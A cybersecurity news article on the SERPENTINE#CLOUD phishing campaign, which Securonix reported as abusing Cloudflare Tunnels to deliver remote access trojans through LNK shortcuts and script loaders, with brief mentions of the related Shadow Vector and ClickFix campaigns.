New Malware Campaign Delivers RATs Through Phishing via Cloudflare Tunnels

Global
New Malware Campaign Delivers RATs Through Phishing via Cloudflare Tunnels

Published:

Written by: Staff Editor
spot_img

Cybersecurity Threat: The SERPENTINE#CLOUD Campaign

Overview of the Attack

A recent cybersecurity investigation has revealed an insidious campaign dubbed SERPENTINE#CLOUD. This operation exploits Cloudflare Tunnel subdomains to deliver malicious payloads, primarily through phishing emails. Security researchers at Securonix noted that the campaign employs Python-based loaders and cleverly crafted shortcut files to execute its attacks.

Phishing Methodology

The attack initiates with the distribution of phishing emails that typically wield themes around invoices or payments. These emails contain links to zipped documents, which house Windows shortcut (LNK) files disguised as legitimate documents. When victims open these malicious shortcuts, they inadvertently initiate the infection process.

Multi-Step Infection

This infection chain is notably intricate, culminating in the activation of a Python-based shellcode loader. It executes payloads using the Donut loader, which operates entirely in memory to avoid detection. According to Tim Peck, a security researcher, this technique makes it increasingly difficult for security defenses to trace and neutralize the threat.

Targeted Regions

Securonix has reported that the campaign primarily targets regions including the United States, United Kingdom, Germany, and various areas across Europe and Asia. Although the identity of the cybercriminals remains unclear, their fluency in English hints at a sophisticated level of operational planning.

Evolution of Tactics

What stands out in this case is the campaign’s adaptability. Initially using internet shortcuts, the attackers have shifted to LNK files masquerading as PDF documents. The payloads retrieved through this method are accessed over WebDAV via the compromised Cloudflare subdomains, illustrating a clear evolution in their tactics.

Previous Incidents

It’s important to note that a variation of this attack had been previously documented by companies like eSentire and Proofpoint. Earlier campaigns set the stage for the distribution of various remote access trojans (RATs) such as AsyncRAT, GuLoader, and Venom RAT.

Utilizing Cloudflare Infrastructure

One of the key advantages that attackers gain from abusing Cloudflare Tunnel infrastructure is the difficulty in detection. By leveraging legitimate cloud service domains, cybercriminals significantly obscure their activities, making it challenging for cybersecurity professionals to differentiate between genuine and malicious traffic. This technique adds an extra layer of stealth to their operations, complicating traditional enforcement measures.

Infection Process

The infection sequence begins when victims activate LNK files, which then download a next-stage payload—a Windows Script File (WSF). This file is executed silently via cscript.exe, ensuring that user intervention goes unnoticed.

The Role of the WSF File

The WSF file serves as a lightweight loader crafted in VBScript. Its primary function is to launch an external batch file from a secondary Cloudflare domain. Peck elaborates that this batch file, named kiki.bat, is crucial for payload delivery, serving as the next stage in the infection timeline.

Stealthy Operations

The batch script is designed to execute in a stealthy manner, displaying a decoy PDF to distract users while checking for antivirus measures. Subsequently, it downloads and runs Python-based payloads, including those packed by Donut, which can deploy diverse RATs.

Code Characteristics

Interestingly, there’s a possibility that the batch script could have been coded with the assistance of a large language model, as suggested by the well-defined comments present in its source code. Securonix emphasizes that the complexities involved in the SERPENTINE#CLOUD attack chain indicate a blend of social engineering and advanced evasion techniques.

Related Threats: Shadow Vector and ClickFix

Shadow Vector in Colombia

In a related discovery, Acronis exposed another malware campaign dubbed Shadow Vector targeting Colombian users. This operation utilizes malicious SVG files embedded in phishing emails that impersonate court notifications. It highlights a broader trend of using digital vectors to deliver malware effectively.

ClickFix Technique Explains Drive-By Compromises

Evolving methods such as the ClickFix tactic have been increasingly prevalent. This approach exploits the natural actions of users to introduce malware under the guise of fixing minor issues or verifying actions like CAPTCHA inputs. Recent data reveals that drive-by compromises rose to represent 23% of phishing tactics, emphasizing the need to recognize and adapt against such methodologies.

Conclusion

As cyber threats continue to evolve, understanding the complex interactions and methods employed in campaigns like SERPENTINE#CLOUD is essential. The blend of social engineering, cloud infrastructure, and sophisticated infection processes not only complicates detection but also poses an ongoing challenge to digital security across various sectors.

spot_img

Related articles

Recent articles

Essential Cybersecurity Trends for 2026 Every Financial Leader Must Address

Global
Essential Cybersecurity Trends for 2026 Every Financial Leader Must Address As the digital landscape evolves, cybersecurity has emerged as a critical concern for financial institutions....
Read more

CHROs Emerge as Key Transformation Leaders Amid Workforce Disruption

Regional
Read more

French Government Messaging Platform Breached, Exposing Personal Data of Over 70,000 Employees

Global
French Government Messaging Platform Breached, Exposing Personal Data of Over 70,000 Employees A significant cybersecurity incident has emerged, affecting over 70,000 employees of the French...
Read more

Google Sues Operators of AI-Driven ‘Outsider’ Phishing Kit Linked to 1.5 Million URLs

Dark Watch
Google Sues Operators of AI-Driven ‘Outsider’ Phishing Kit Linked to 1.5 Million URLs Google has initiated legal proceedings against the creators of the Outsider AI...
Read more